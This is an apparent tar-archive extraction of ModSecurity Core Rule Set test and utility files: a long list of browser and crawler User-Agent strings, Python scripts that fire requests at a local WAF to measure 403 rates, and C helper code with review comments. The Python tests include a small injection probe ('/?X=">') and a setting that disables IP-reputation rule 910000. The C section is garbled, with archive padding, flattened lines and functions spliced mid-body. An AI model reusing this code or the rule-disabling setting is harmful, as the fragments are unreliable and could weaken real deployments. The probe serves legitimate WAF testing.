CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; ja-jp) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU OS 4_3 like Mac OS X; en-us) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8F190 Safari/6533.18.5 Mozilla/5.0 (iPad; U; CPU iPad OS 5_0_1 like Mac OS X; en-us) AppleWebKit/535.1+ (KHTML like Gecko) Version/7.2.0.0 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_0 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5A347 Safari/525.200 Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16 Mozilla/5.0 (iPhone; U; CPU iPhone 
OS 4_0 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A293 Safari/531.22.7 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_2_1 like Mac OS X; da-dk) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5 Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_3 like Mac OS X; de-de) AppleWebKit/533.17.9 (KHTML, like Gecko) Mobile/8F190 Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 Mozilla/5.0 (iPhone; U; CPU iPhone OS 5_1_1 like Mac OS X; da-dk) AppleWebKit/534.46.0 (KHTML, like Gecko) CriOS/19.0.1084.60 Mobile/9B206 Safari/7534.48.3 Mozilla/5.0 (iPhone; U; CPU iPhone OS) (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420 (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 2_2_1 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5H11a Safari/525.20 Mozilla/5.0 (iPod; U; CPU iPhone OS 3_1_1 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Mobile/7C145 Mozilla/5.0 (iPod; U; CPU iPhone OS 6_1 like Mac OS X; en-HK) AppleWebKit/534.35 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.35 Puffin/3.9174IP Mobile Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 
Safari/525.27.1 Desktop/1.0 Mozilla/5.0 (webOS/1.3; U; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/1.0 Safari/525.27.1 Desktop/1.0 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 NetSurf/1.2 (NetBSD; amd64) Nokia3230/2.0 (5.0614.0) SymbianOS/7.0s Series60/2.1 Profile/MIDP-2.0 Configuration/CLDC-1.0 Nokia6100/1.0 (04.01) Profile/MIDP-1.0 Configuration/CLDC-1.0 Nokia6230/2.0 (04.44) Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6230i/2.0 (03.80) Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6630/1.0 (2.3.129) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia6630/1.0 (2.39.15) SymbianOS/8.0 Series60/2.6 Profile/MIDP-2.0 Configuration/CLDC-1.1 Nokia7250/1.0 (3.14) Profile/MIDP-1.0 Configuration/CLDC-1.0 NokiaN70-1/5.0609.2.0.1 Series60/2.8 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 Offline Explorer/2.5 Opera/10.61 (J2ME/MIDP; Opera Mini/5.1.21219/19.999; en-US; rv:1.9.3a5) WebKit/534.5 Presto/2.6.30 Opera/7.50 (Windows ME; U) [en] Opera/7.50 (Windows XP; U) Opera/7.51 (Windows NT 5.1; U) [en] Opera/8.01 (J2ME/MIDP; Opera Mini/1.0.1479/HiFi; SonyEricsson P900; no; U; ssr) Opera/9.0 (Macintosh; PPC Mac OS X; U; en) Opera/9.20 (Macintosh; Intel Mac OS X; U; en) Opera/9.25 (Windows NT 6.0; U; en) Opera/9.30 (Nintendo Wii; U; ; 2047-7; en) Opera/9.5 (Microsoft Windows; PPC; Opera Mobi; U) SonyEricssonX1i/R2AA Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/9.51 Beta (Microsoft Windows; PPC; Opera Mobi/1718; U; en) Opera/9.60 (J2ME/MIDP; Opera Mini/4.1.11320/608; U; en) Presto/2.2.0 Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14320/554; U; cs) Presto/2.2.0 Opera/9.64 (Macintosh; PPC Mac OS X; U; en) Presto/2.1.1 Opera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1 Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 Opera/9.80 (Android; Opera 
Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Opera/9.80 (Android; Opera Mini/7.5.33361/31.1543; U; en) Presto/2.8.119 Version/11.1010 Opera/9.80 (J2ME/MIDP; Opera Mini/5.0.16823/1428; U; en) Presto/2.2.0 Opera/9.80 (Macintosh; Intel Mac OS X 10.4.11; U; en) Presto/2.7.62 Version/11.00 Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52 Opera/9.80 (Macintosh; Intel Mac OS X; U; en) Presto/2.6.30 Version/10.61 Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 Opera/9.80 (S60; SymbOS; Opera Mobi/499; U; ru) Presto/2.4.18 Version/10.00 Opera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10 Opera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.10 Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14 Opera/9.80 (Windows NT 6.1; U; en) Presto/2.7.62 Version/11.01 Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00 Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.16 Opera/9.80 (X11; FreeBSD 8.1-RELEASE i386; Edition Next) Presto/2.12.388 Version/12.10 Opera/9.80 (X11; Linux i686) Presto/2.12.388 Version/12.16 Opera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.10 Opera/9.80 (X11; Linux x86_64; U; pl) Presto/2.7.62 Version/11.00 P3P Validator POLARIS/6.01 (BREW 3.1.5; U; en-us; LG; LX265; POLARIS/6.01/WAP) MMP/2.0 profile/MIDP-2.1 Configuration/CLDC-1.1 POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 Peach/1.01 (Ubuntu 8.04 LTS; U; en) Python-urllib/2.5 SAMSUNG-S8000/S8000XXIF3 SHP/VPP/R5 Jasmine/1.0 Nextreaming SMM-MMS/1.2.0 profile/MIDP-2.1 configuration/CLDC-1.1 FirePHP/0.3 SAMSUNG-SGH-A867/A867UCHJ3 SHP/VPP/R5 NetFront/35 SMM-MMS/1.2.0 profile/MIDP-2.0 configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; http://www.google.com/bot.html) SEC-SGHE900/1.0 
NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4509/1378; nl; U; ssr) SEC-SGHX210/1.0 UP.Link/6.3.1.13.0 SEC-SGHX820/1.0 NetFront/3.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 SearchExpress SonyEricssonK310iv/R4DA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.1.13.0 SonyEricssonK550i/R1JD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK610i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK750i/R1CA Browser/SEMC-Browser/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonK800i/R1CB Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SonyEricssonK810i/R1KG Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonS500i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonT100/R101 SonyEricssonT610/R201 Profile/MIDP-1.0 Configuration/CLDC-1.0 SonyEricssonT650i/R7AA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonT68/R201A SonyEricssonW580i/R6BC Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW660i/R6AD Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW810i/R4EA Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SonyEricssonW850i/R1ED Browser/NetFront/3.3 Profile/MIDP-2.0 Configuration/CLDC-1.1 SonyEricssonW950i/R100 Mozilla/4.0 (compatible; MSIE 6.0; Symbian OS; 323) Opera 8.60 [en-US] SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0 SonyEricssonZ800/R1Y Browser/SEMC-Browser/4.1 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Link/6.3.0.0.0 SuperBot/4.4.0.60 (Windows XP) UCWEB/8.8 (SymbianOS/9.2; U; en-US; NokiaE63) AppleWebKit/534.1 UCBrowser/8.8.0.245 Mobile UCWEB/8.8 (iPhone; CPU OS_6; en-US)AppleWebKit/534.1 U3/3.0.0 Mobile User agent: Mozilla/5.0 (Linux; Android 4.3; SPH-L710 Build/JSS15J) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.99 
Mobile Safari/537.36 Uzbl (Webkit 1.3) (Linux i686 [i686]) Vodafone/1.0/V802SE/SEJ001 Browser/SEMC-Browser/4.1 W3C_Validator/1.305.2.12 libwww-perl/5.64 W3C_Validator/1.654 WDG_Validator/1.6.2 Web Downloader/6.9 WebCopier v4.6 WebZIP/3.5 (http://www.spidersoft.com) Wget/1.9 cvs-stable (Red Hat modified) Wget/1.9.1 everyfeed-spider/2.0 (http://www.everyfeed.com) facebookscraper/1.0( http://www.facebook.com/sharescraper_help.php) grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) grub-client-1.5.3; (grub-client-1.5.3; Crawl your own stuff with http://grub.org) iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) iTunes/4.2 (Macintosh; U; PPC Mac OS X 10.2) iTunes/9.0.2 (Windows; N) iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca) libwww-perl/5.820 msnbot-media/1.1 ( http://search.msn.com/msnbot.htm) msnbot/0.11 ( http://search.msn.com/msnbot.htm) msnbot/1.0 ( http://search.msn.com/msnbot.htm) msnbot/1.1 ( http://search.msn.com/msnbot.htm) nook browser/1.0 portalmmm/2.0 N410i(c20;TB) w3m/0.5.1 w3m/0.5.1 wii libnup/1.0 
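# File: modsecurity-crs-3.3.5/tests/regression/utils/testSampling.py
from ftw import ruleset, http, errors

"""
This script assumes that default blocking action is 403
and sampling is one. It will send a known bad request
that is expected to be blocked. If sampling is on it
will only block a certain percentage. We send 1000
requests to verify this. In order to do this we must
also turn off IP Reputation blocking.
SecAction "id:900005,phase:1,nolog,pass,ctl:ruleEngine=on,ctl:ruleRemoveById=910000"
"""
# NOTE(review): run_requests() below starts 5 threads of 100 requests each,
# i.e. 500 requests in total, not the 1000 mentioned in the text above.
# NOTE(review): the SecAction quoted above removes rule 910000 (described above
# as IP Reputation blocking) so that it cannot skew the sampling measurement.
# It is a test-only setting and should not be carried into a production
# configuration.


def send_requests(input_data, subiters, result, index):
    """Send input_data subiters times and record the HTTP status of each reply.

    Each status is stored in the shared dict ``result`` under the key
    str(index) + str(i). The keys stay unambiguous as long as index is a
    single digit, which is the case for the caller in this file (range(5)).
    """
    http_ua = http.HttpUA()
    for i in range(0, subiters):
        new_index = str(index) + str(i)
        http_ua.send_request(input_data)
        result[new_index] = http_ua.response_object.status


def run_requests(iterations):
    """Send one fixed GET request from 5 threads and report the 403 rate.

    ``iterations`` is kept for interface compatibility but is not used: each
    of the 5 threads always sends 100 requests to localhost:80.

    Returns a tuple (percent_403, percent_not_403) computed over the statuses
    that were actually collected.
    """
    request = ruleset.Input(method="GET", protocol="http", port=80, uri='/?X=">', dest_addr="localhost", headers={"Host": "localhost", "User-Agent": "ModSecurity CRS 3 test"})
    import threading
    returns = {}
    threads = []
    for i in range(5):
        t = threading.Thread(target=send_requests, args=(request, 100, returns, i,))
        threads.append(t)
        t.start()
    # Wait for every worker before counting, otherwise the totals are partial.
    for t in threads:
        t.join()
    status_not_403 = 0
    status_403 = 0
    for status in returns.values():
        if status == 403:
            status_403 += 1
        else:
            status_not_403 += 1
    # Multiply by 1.0 to force float division under Python 2 as well.
    total = len(returns) * 1.0
    x = (status_403 / total) * 100
    y = (status_not_403 / total) * 100
    # Single-argument print() gives the same output under Python 2 and 3.
    print("403s = %s" % x)
    print("not 403s = %s" % y)
    return (x, y)


def test_sampling():
    """Check that roughly half of the requests are blocked (45% < rate < 55%)."""
    print("running")
    block, passed = run_requests(100)
    assert 45 < block < 55


# File: modsecurity-crs-3.3.5/tests/regression/utils/testUserAgents.py
from ftw import ruleset, http, errors

"""
This script reads in a list of popular Useragents and checks to see if it triggers
It expects 403's to be returned for a rule firing
"""


def read_useragents(filename):
    """Return the lines of ``filename`` as a list of whitespace-stripped strings."""
    # The context manager closes the file even if reading fails.
    with open(filename, 'r') as f:
        return [agent.strip() for agent in f.readlines()]


def run_requests(useragent_list):
    """Send GET / to localhost:80 once per User-Agent and print the 403 rate.

    A 403 is counted as a rule firing for that User-Agent; every other status
    is counted as not blocked. Prints both percentages and returns None.
    """
    if not useragent_list:
        # Avoid a division by zero when the data file is empty.
        print("No user agents to test")
        return
    status_not_403 = 0
    status_403 = 0
    for useragent in useragent_list:
        # Progress counter, printed before every 15th request.
        sent = status_not_403 + status_403
        if sent % 15 == 0:
            print("Send %d Out of %d" % (sent, len(useragent_list)))
        input_data = ruleset.Input(method="GET", protocol="http", port=80, uri='/', dest_addr="localhost", headers={"Host": "localhost", "User-Agent": useragent})
        http_ua = http.HttpUA()
        http_ua.send_request(input_data)
        status = http_ua.response_object.status
        if status == 403:
            status_403 += 1
        else:
            status_not_403 += 1
    # Multiply by 1.0 to force float division under Python 2 as well.
    total = len(useragent_list) * 1.0
    x = (status_403 / total) * 100
    y = (status_not_403 / total) * 100
    print("403s = %s" % x)
    print("not 403s = %s" % y)


def main():
    """Run the User-Agent check against ./data/popularUAs.data."""
    uas = read_useragents('./data/popularUAs.data')
    run_requests(uas)


main()

# End of tests/regression/utils/testUserAgents.py; the archive continues with
# modsecurity-crs-3.3.5/util/ and modsecurity-crs-3.3.5/util/README.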
���������������������The util directory contains many supporting tools/scripts that may be used with the OWASP ModSecurity CRS files. Docker Support ============== A Dockerfile can be found in the docker/ directory, along with additional notes in docker/README.md ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/�������������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0020040�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/�������������������������������������������������������0000775�0000000�0000000�00000000000�14461225151�0021073�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/util/av-scanning/runAV/common.c�����������������������������������������������0000775�0000000�0000000�00000043616�14461225151�0022544�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000����������������������������������������������������������������������������������������������������
��������������������������������������������������������������������#include "common.h" int lock_file(char *filename) { int fd; if (!filename) return -1; if ((fd = open(filename,O_RDONLY | O_CREAT , S_IRWXU)) < 0) { print_error("lock_file","open",modsec_rpc_log_file,errno); return -1; } flock(fd,LOCK_EX); return fd; } int unlock_file(int fd) { flock(fd,LOCK_UN); return 0; } int print_request(char* url,char *command,parameter_t *parameters, int num_of_parameters, int mask) { char time_str[64], line[1024*1024]; time_t t; int fd; int i; switch (atoi(modsec_rpc_log_level)) { case DEBUG: time(&t); ctime_r(&t,time_str); time_str[strlen(time_str)-1] = '\0'; if ((fd = open(modsec_rpc_log_file,O_WRONLY | O_CREAT | O_APPEND | O_SYNC , S_IRWXU)) < 0) { print_error("print_request","open",modsec_rpc_log_file,errno); fd=2; } flock(fd,LOCK_EX); sprintf(line,"%s:REQUEST-BEGIN:======================================\n",time_str); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); snprintf(line,1024*1024,"URL:%s\nCommand:%s\n",url,command); line[1024*1024-1]='\0'; write(fd,line,strlen(line)); for (i=0; i 0 && output) output[0]='\0'; if (!(fp=popen(command,"r"))) { print_error("run_cmd","popen",command,errno); return -1; } while (output_size && fgets(line,output_size>1024?1024:output_size,fp)) { strcat(output, line); output_size -= strlen(line); } if (!output_size) while (fgets(line,1024,fp)); pclose(fp); return 0; } int find_param_idx(char *parameter_name, parameter_t *parameters, int max_parameters) { int i, idx=-1; for (i = 0; (i < max_parameters) && (idx < 0); i++) if ( strstr(parameters[i].name,parameter_name) ) idx=i; return idx; } int parse_file(char *filename, parameter_t *parameters, int max_parameters) { char line[1024], *ptr; int i; FILE *fp; if (!max_parameters || (parameters == NULL) || (filename == NULL)) { print_error("parse_file","invalid input parameters","none",0); return 0; } if ((fp = fopen(filename,"r")) == NULL ) { 
print_error("parse_file","fopen",filename,errno); return 0; } i=0; while ( i < max_parameters && fgets(line,1024,fp)) { if (ptr = strstr(line,"#")) *ptr='\0'; if (sscanf(line,"%[^=]=%s",parameters[i].name,parameters[i].value) != 2) continue; i++; } fclose(fp); return i; } int change_file(char *filename, parameter_t parameter) { char line[1024], *name, *value; int i, found=0; FILE *fp; if (filename == NULL) return 0; if ((fp = fopen(filename,"r+")) == NULL ) return 0; i=0; while ( fgets(line,1024,fp)) { sscanf(line,"%[^=]=%s",name,value); if (name && !strcmp(name,parameter.name)) { fprintf(fp,"%s=%s\n",name,parameter.value); found=1; continue; } else fprintf(fp,"%s",line); } fclose(fp); return found; } int copy_file(char *src_file, char *dst_file) { char line[1024]; FILE *sfp, *dfp; if (src_file == NULL || dst_file == NULL) return 0; if ((sfp = fopen(src_file,"r")) == NULL ) return 0; if ((dfp = fopen(dst_file,"w")) == NULL ) { fclose(sfp); return 0; } while ( fgets(line,1024,sfp)) fprintf(dfp,"%s",line); fclose(sfp); fclose(dfp); return 1; } int parse_query(char *query, parameter_t *parameters, int max_parameters) { char *ptr, *dst_ptr, num[3]; int i, len; if (!max_parameters || (parameters == NULL) || (query == NULL)) return 0; ptr=query; i=0; while ((i < max_parameters) && *ptr) { parameters[i].name[0] = '\0'; dst_ptr = parameters[i].name; len=0; while (*ptr && (*ptr != '=') && (len++ < MAX_NAME_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if (*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_NAME_LENGTH) while (*ptr && (*ptr != '=')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; parameters[i].value[0] = '\0'; dst_ptr = parameters[i].value; len=0; while (*ptr && (*ptr != '&') && (len++ < MAX_VALUE_LENGTH)) { if (*ptr == '%' && *(ptr+1) && *(ptr+2)) { num[0]=*(ptr+1); num[1]=*(ptr+2); num[2]='\0'; ptr += 3; *dst_ptr=(char)strtol(num,NULL,16); if 
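(*dst_ptr) dst_ptr++; } else *dst_ptr++ = *ptr++; } if (len >= MAX_VALUE_LENGTH) while (*ptr && (*ptr != '&')) *ptr++; if (*ptr) ptr++; *dst_ptr = '\0'; i++; } return i; }

/*
 * Collect the request parameters of a CGI invocation.
 *
 * A non-empty QUERY_STRING is parsed and the body is ignored.  Otherwise
 * CONTENT_LENGTH bytes are read from standard input and parsed the same way.
 *
 * parameters      destination array, filled by parse_query()
 * max_parameters  capacity of that array
 *
 * Returns what parse_query() returns, or 0 when there is nothing to parse,
 * the declared length is not acceptable, or the buffer cannot be allocated.
 */
int parse_query_and_body (parameter_t *parameters, int max_parameters)
{
  /* Reviewer-chosen ceiling for a request body (1 MiB); adjust to the
     deployment.  CONTENT_LENGTH is supplied by the client, so it must not
     be allowed to size an allocation on its own. */
  const long body_limit = 1024L * 1024L;
  char *query, *content_length_env;
  long declared_length;
  int num_of_params, body_len, content_length, chunk, got;

  query = getenv("QUERY_STRING");
  if (query && *query)
    return parse_query(query, parameters, max_parameters);

  content_length_env = getenv("CONTENT_LENGTH");
  if (!content_length_env || !*content_length_env)
    return 0;

  /* A negative value, or one that does not fit in an int, used to reach
     malloc(content_length+1): with -1 that is a zero-byte request followed
     by the write of the terminator below. */
  declared_length = atol(content_length_env);
  if (declared_length < 0 || declared_length > body_limit)
    return 0;
  content_length = (int)declared_length;

  query = malloc((size_t)content_length + 1);
  if (!query)
    return 0;

  /* Read in pieces of at most 1024 bytes until the declared length is
     reached or read() reports end of input or an error. */
  body_len = 0;
  while (body_len < content_length) {
    chunk = content_length - body_len;
    if (chunk > 1024)
      chunk = 1024;
    got = read(0, query + body_len, chunk);
    if (got <= 0)
      break;
    body_len += got;
  }
  query[body_len] = '\0';

  num_of_params = parse_query(query, parameters, max_parameters);
  free(query);
  return num_of_params;
}

/*
 * NOTE(review): the listing is incomplete from here to the closing brace
 * below.  It starts as parse_cli() and continues in the tail of a function
 * that reads a reply from a socket (it uses reply, sock and max_reply_size);
 * the text in between is missing, so the code is kept exactly as found.
 * The visible tail stores the terminator at reply[reply_len]; if the missing
 * loop condition lets reply_len reach max_reply_size, that write needs a
 * buffer of max_reply_size + 1 bytes -- confirm against the complete file.
 */
int parse_cli (parameter_t *parameters, int max_parameters, int num_of_args, char *args[]) { char name[MAX_NAME_LENGTH], value[MAX_VALUE_LENGTH]; int i, num_of_params=0; if (num_of_args > 0) for (i=0; i0) ) { i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); if (i > 0 ) reply_len+=i; } reply[reply_len] = '\0'; shutdown(sock,SHUT_RDWR); close(sock); return reply_len; }

/*
 * Return the index of the first of the num_of_ips blocklist entries whose
 * ip field contains `ip`, or -1 when there is none (or `ip` is NULL).
 *
 * NOTE(review): the comparison is strstr(), i.e. a substring test, so
 * "1.2.3.4" is also found inside "11.2.3.4" or "1.2.3.40", and an empty
 * string is found in every entry.  If exact addresses are meant, callers
 * should be checked before this is tightened to an equality test.
 */
int find_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
{
  int i;

  if (!ip)
    return -1;

  for (i = 0; i < num_of_ips; i++)
    if (strstr(blocklist[i].ip, ip))
      return i;

  return -1;
}

/*
 * Remove entries from the blocklist by closing the gap they leave.
 *
 * ip != NULL  every entry whose ip field contains `ip` is removed
 *             (substring test, as in find_ip_idx)
 * ip == NULL  every entry whose `end` time lies before the current time is
 *             removed
 *
 * Returns the index at which the last removal happened, or -1 when nothing
 * was removed.  num_of_ips is received by value, so the reduced count is not
 * reported to the caller.
 */
int remove_ip_idx(char *ip, blocklist_t *blocklist, int num_of_ips)
{
  int i, j, idx=-1;
  time_t t;

  time(&t);

  i = 0;
  while (i < num_of_ips) {
    if ( (ip && strstr(blocklist[i].ip,ip)) || (!ip && (t > blocklist[i].end)) ) {
      idx = i;
      /* Whole-entry assignment copies ip, start, duration, end and token. */
      for (j = i; j < (num_of_ips-1); j++)
        blocklist[j] = blocklist[j+1];
      num_of_ips--;
      /* Slot i now holds the entry that followed the removed one.  It has
         to be examined as well, so i is not advanced here; advancing it
         skipped the second of two adjacent matches. */
    } else {
      i++;
    }
  }

  return idx;
}

/*
 * Load settings from `filename` into the global configuration strings.
 *
 * The file is parsed with parse_file(); each known key that is present
 * overwrites the matching global, keys that are absent leave it unchanged.
 *
 * Returns the number of parameters parse_file() reported.
 */
int read_conf_file (char *filename)
{
  /* Key in the configuration file, the global it fills, and that global's
     capacity. */
  static const struct {
    char *name;
    char *dest;
    size_t size;
  } settings[] = {
    { "MODSEC_CLI_HOME",                  modsec_cli_home,                  sizeof modsec_cli_home },
    { "MODSEC_RPC_HOME",                  modsec_rpc_home,                  sizeof modsec_rpc_home },
    { "MODSEC_RPC_LOG_FILE",              modsec_rpc_log_file,              sizeof modsec_rpc_log_file },
    { "MODSEC_RPC_LOG_LEVEL",             modsec_rpc_log_level,             sizeof modsec_rpc_log_level },
    { "MODSEC_RPC_SSL_LOCKFILE",          modsec_rpc_ssl_lockfile,          sizeof modsec_rpc_ssl_lockfile },
    { "MODSEC_RPC_SENSOR_LOCKFILE",       modsec_rpc_sensor_lockfile,       sizeof modsec_rpc_sensor_lockfile },
    { "MODSEC_RPC_REVERSEPROXY_LOCKFILE", modsec_rpc_reverseproxy_lockfile, sizeof modsec_rpc_reverseproxy_lockfile },
    { "MODSEC_RPC_EXTERNALNIC_LOCKFILE",  modsec_rpc_externalnic_lockfile,  sizeof modsec_rpc_externalnic_lockfile },
    { "MODSEC_RPC_MUI_LOCKFILE",          modsec_rpc_mui_lockfile,          sizeof modsec_rpc_mui_lockfile },
    { "MODSEC_PROXY_HOME",                modsec_proxy_home,                sizeof modsec_proxy_home },
    { "MODSEC_PROXY_IP",                  modsec_proxy_ip,                  sizeof modsec_proxy_ip },
    { "MODSEC_PROXY_PORT",                modsec_proxy_port,                sizeof modsec_proxy_port },
    { "MODSEC_PROXY_NETWORK_PREFIX",      modsec_proxy_network_prefix,      sizeof modsec_proxy_network_prefix },
    { "MODSEC_PROXY_BIN",                 modsec_proxy_bin,                 sizeof modsec_proxy_bin },
    { "MODSEC_PROXY_CONF",                modsec_proxy_conf,                sizeof modsec_proxy_conf },
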